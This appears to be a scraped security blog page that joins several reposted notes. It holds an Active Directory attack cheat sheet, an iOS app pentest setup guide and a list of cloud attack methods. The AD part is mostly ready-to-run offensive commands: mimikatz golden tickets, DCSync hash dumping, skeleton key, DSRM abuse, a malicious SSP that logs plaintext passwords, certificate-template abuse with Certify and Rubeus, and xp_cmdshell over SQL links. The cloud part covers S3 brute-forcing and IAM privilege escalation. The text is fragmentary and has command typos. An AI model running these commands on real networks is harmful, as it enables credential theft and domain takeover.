#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain
dir \\dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /allDetailed Articles:
Check for Vulnerable Certificate Templates with: Certify
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
.\Certify.exe find /vulnerable /quietMake sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.
Request the DA's Account Certificate with Certify
.\Certify.exe request /template:<Template Name> /quiet /ca:"<CA Name>" /domain:<domain.com> /path:CN=Configuration,DC=<domain>,DC=com /altname:<Domain Admin AltName> /machineThis should return a valid certificate for the associated DA account.
The exported cert.pem and cert.key files must be consolidated into a single cert.pem file, with one gap of whitespace between the END RSA PRIVATE KEY and the BEGIN CERTIFICATE.
Example of cert.pem:
-----BEGIN RSA PRIVATE KEY-----
BIIEogIBAAk15x0ID[...]
[...]
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[...]
[...]
[...]
-----END CERTIFICATE-----
#Utilize openssl to Convert to PKCS #12 Format
The openssl command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxOnce the cert.pfx file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.)
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to request a Kerberos TGT for the DA account which will then be imported into memory.
.\Rubeus.exe asktht /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /pttThis should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack.
#Execute mimikatz on DC as DA to grab krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>
#On any machine:
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:
<HashOfkrbtgtAccount> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'
#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm
#DCsync using secretsdump.py from impacket with Kerberos Authentication
secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlmTip:
/ptt -> inject ticket on current running session
/ticket -> save the ticket on the system for later use
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<TheTargetMachine> /service:
<ServiceType> /rc4:<TheSPN's Account NTLM Hash> /user:<UserToImpersonate> /ptt"'#Exploitation Command runned as DA:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC's FQDN>
#Access using the password "mimikatz"
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\AdministratorWUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!
#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>
#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>
#Alter the Logon behaviour on registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -VerboseThen just PTH to get local admin access on DC!
WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!
From powershell:
#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
#Append mimilib:
$packages += "mimilib"
#Change the new packages name
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages
#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log
WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT.
⚠️ The access we will have will be limited to what our DA account is configured to have on the other Forest!
#Dump the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
#Forge an inter-realm TGT using the Golden Ticket attack
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:
<OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:
<PathToSaveTheGoldenTicket>"'.\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /pttGet-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -VerboseCheck for existing Database Links:
#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instance <SPN> -Verbose
#MSSQL Query:
select * from master..sysserversThen we can use queries to enumerate other links from the linked Database:
#Manualy:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')
#PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
Get-SQLServerLinkCrawl -Instance <SPN> -Verbose
#Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell
#Or if it is disabled enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"Query execution:
Get-SQLServerLinkCrawl -Instace <SPN> -Query "exec master..xp_cmdshell 'whoami'"WUT IS DIS?:
TL;DR
If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest.
Tools we are going to use:
Exploitation example:
#Start monitoring for TGTs with rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$
#Execute the printerbug to trigger the force authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local
#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>
#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /allDetailed Articles:
| Active Directory 정보 수집 (0) | 2023.10.25 |
|---|---|
| Active Directory Pentesting Resources (1) | 2023.10.25 |
| iOS Application Pentest with me.. (Part- 1) (1) | 2023.10.17 |
| 60 Methods For Cloud Attacks (0) | 2023.10.16 |
| 윈도우10, XPS 뷰어 오프라인(폐쇄망) 설치방법 (0) | 2023.10.04 |
wtdsoul
https://kishorbalan.medium.com/start-your-first-ios-application-pentest-with-me-part-1-1692311f1902
Start your first iOS Application Pentest with me.. (Part- 1)
Hola Heckers,
kishorbalan.medium.com
1: Installing the required tools and Cydia tweaks
Note:- There are a plenty of different tools and methodologies when its coming to the iOS pentesting and I won’t be able to explain all of them, only my methodology will be shared here.
1: A Jailbroken iOS device
Setting up the lab and installing basic tools:
1: Hope you already have Frida and Objection tools in your system, If not , install them
Releases · frida/frida (github.com)
GitHub — sensepost/objection: 📱 objection — runtime mobile exploration
2: iTunes: We know iTunes will help us to work with iOS environments in several ways.
3: 3uTools: This one has a lot of useful features such as Direct SSH connection, Screen mirroring, iOS application installer, etc..
3uTools | The best all-in-one tool for iOS users
4: Cydia Application:- Basically, Cydia is a third-party application installer which is similar to the App Store and developed for the jailbroken iOS iDevices. If you are jailbreaking your device with Checkra1n or Uncover, The cydia app will automatically get installed into your device.
In case of Checkra1n, you can manually install the Cydia from the Checkra1n app.
In case of Uncover, you can enable the Reinstall Cydia option from the Uncover app settings and start jailbreaking.
After the jailbreaking process, the Cydia app can be found in the device.
1: With the help of Cydia
Step 1: Add the repo URL of the required cydia tweak in the source section
Step 2: After adding the Source, You can find search the tweak from the search section
Step 3: Select the tweak and install, Respring the device if it is needed.
2: Direct method:
Installing the Tweaks with their .deb files through the OpenSSH terminal
Step 1: Find the Tweak’s deb file from its source.
Step 2: Copy the file link and SSH to the iOS device as root user
Step 3: Download the deb file using wget
Step 4: Make the file executable with the permission command “chmod +x file.deb” and install it using “dpkg” command
Step 5: That’s it, Now the tweak will be installed on your device
Dependencies:
The following packages should be installed on the device:
Installing the required Cydia Tweaks:
Tweaks are basically third party applications which can be used to outrun some sort of fences set up in the target iOS applications. A lot of tweaks are available but here I am listing out the necessary ones.
A: Filza:
Repo: https://tigisoftware.com/cydia/
Filza is a file manager for exploring directories including root’s directories.
Filza also provides WebDav server so we can access the application on our other local machines.
B: App Sync Unified
Repo: https://cydia.akemi.ai/
The tweak helps to install IPA files which are ad-hoc signed, fakesigned, or unsigned.
C: IPA installer
Repo: http://apt.thebigboss.org/repofiles/cydia/
This one can be used to install/Backup IPA files directly to our jailbroken iOS device.
D: OpenSSH
Repo: http://apt.saurik.com/
We know why we need an OpenSSH feature. We can get a terminal access to our iOS device with root privileges.
Root credential: — root: alpine
E: Frida
Repo: https://build.frida.re/
To work with frida tools, a frida server must be installed on our iOS device.
F: Plutil
Repo: https://apt.bingner.com/
This tool can be used to read .plist files (Similar to xml files in android)
G: fsmon
Repo: GitHub — nowsecure/fsmon: monitor filesystem on iOS / OS X / Android / FirefoxOS / Linux
This is a FileSystem Monitor utility that can be used in environments such as Linux, Android and iOS.
Following are the mostly used tweaks used for bypassing Jailbreak detections.
A: Liberty Lite
Repo: https://ryleyangus.com/repo/
B: A-Bypass
Repo: https://repo.co.kr/
C: HideJB
Repo: http://apt.thebigboss.org/repofiles/cydia/
D: Hestia
Repo: https://havoc.app/
E: iHide
Repo: https://repo.kc57.com/
Alternatively, You can use frida scripts to bypass the JB detection
Following are the most used tweaks used for bypassing SSL certificate pinning.
A: SSL Kill Switch
Repo: https://julioverne.github.io/
B: SSLBypass
Repo: SSLBypass/packages at main · evilpenguin/SSLBypass · GitHub
Alternatively, You can use frida scripts to bypass the SSL pinning
Note:- Most of the Jailbreak Detection Bypass and SSL Bypass tweaks can be found in the device settings after the installation.
So that’s it guys, We almost ready to go. We will kickstart on our first iOS application pentesting in the Part-2. If I have missed something in this part, we will cover ’em up in the next part. Stay tuned, Happy hacking :)
| Active Directory Pentesting Resources (1) | 2023.10.25 |
|---|---|
| Active Directory Attack List (1) | 2023.10.18 |
| 60 Methods For Cloud Attacks (0) | 2023.10.16 |
| 윈도우10, XPS 뷰어 오프라인(폐쇄망) 설치방법 (0) | 2023.10.04 |
| Powershell 프록시 설정 (0) | 2023.09.25 |
wtdsoul
https://redteamrecipe.com/60-Method-For-Cloud-Attacks/
60 Methods For Cloud Attacks(RTC0009)
60 Methods For Cloud Attacks
redteamrecipe.com
By replacing <domain> with an actual domain name, the command would attempt to retrieve information specific to that domain using the cf enum tool. The details of what kind of information is gathered and how it is presented would depend on the specific implementation of the tool being used.
By providing the --bucket parameter followed by a specific value (gwen001-test002), the script will attempt to brute-force the Amazon S3 buckets using that particular value as the target. The script likely includes logic to iterate through different bucket names, trying each one until a valid or accessible bucket is found.
The purpose of the command seems to be to perform a takeover attempt on a domain. Domain takeover refers to the act of gaining control over a domain that is no longer actively maintained or properly configured, allowing an attacker to take control of its associated services or resources.
By replacing <bucket_name> with the actual name of the S3 bucket and <object_key> with the key or path to the desired object within the bucket, the command will initiate the download process for that specific object. The downloaded object will typically be saved to the local file system, with the name and location depending on the behavior of the cf s3download tool.
By replacing <url> with the actual target URL, the command will initiate a directory scan on that specific URL using the cf dirscan tool. The tool will attempt to enumerate and list directories or paths within the target URL, providing information about the directory structure of the web application or website.
By running ccat cloudtrail, the command will attempt to format and enhance the display of CloudTrail log files for better readability. It may apply syntax highlighting, indentation, or other visual enhancements to make the log content easier to analyze and interpret. This can be particularly useful when working with large or complex CloudTrail logs, as it helps highlight key information and improve overall readability.
The -var 'instance_type=p2.xlarge' option is used to set a variable named instance_type to the value p2.xlarge. This variable can be referenced in the Terraform configuration files to dynamically configure resources.
In this command, the pacu.py script is being executed with the escalate_iam_roles method, which is specifically designed to escalate privileges associated with IAM roles. The --profile option specifies the AWS profile to use for authentication, and the --regions option specifies the AWS regions to target. The --instances option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.
https://github.com/FalconForceTeam/FalconFriday
https://github.com/FalconForceTeam/FalconFriday
https://gist.github.com/invictus-ir/06d45ad738e3cc90bc4afa80f6a72c0a
| Active Directory Attack List (1) | 2023.10.18 |
|---|---|
| iOS Application Pentest with me.. (Part- 1) (1) | 2023.10.17 |
| 윈도우10, XPS 뷰어 오프라인(폐쇄망) 설치방법 (0) | 2023.10.04 |
| Powershell 프록시 설정 (0) | 2023.09.25 |
| WordPress XMLRPC Attack (0) | 2023.09.04 |
wtdsoul
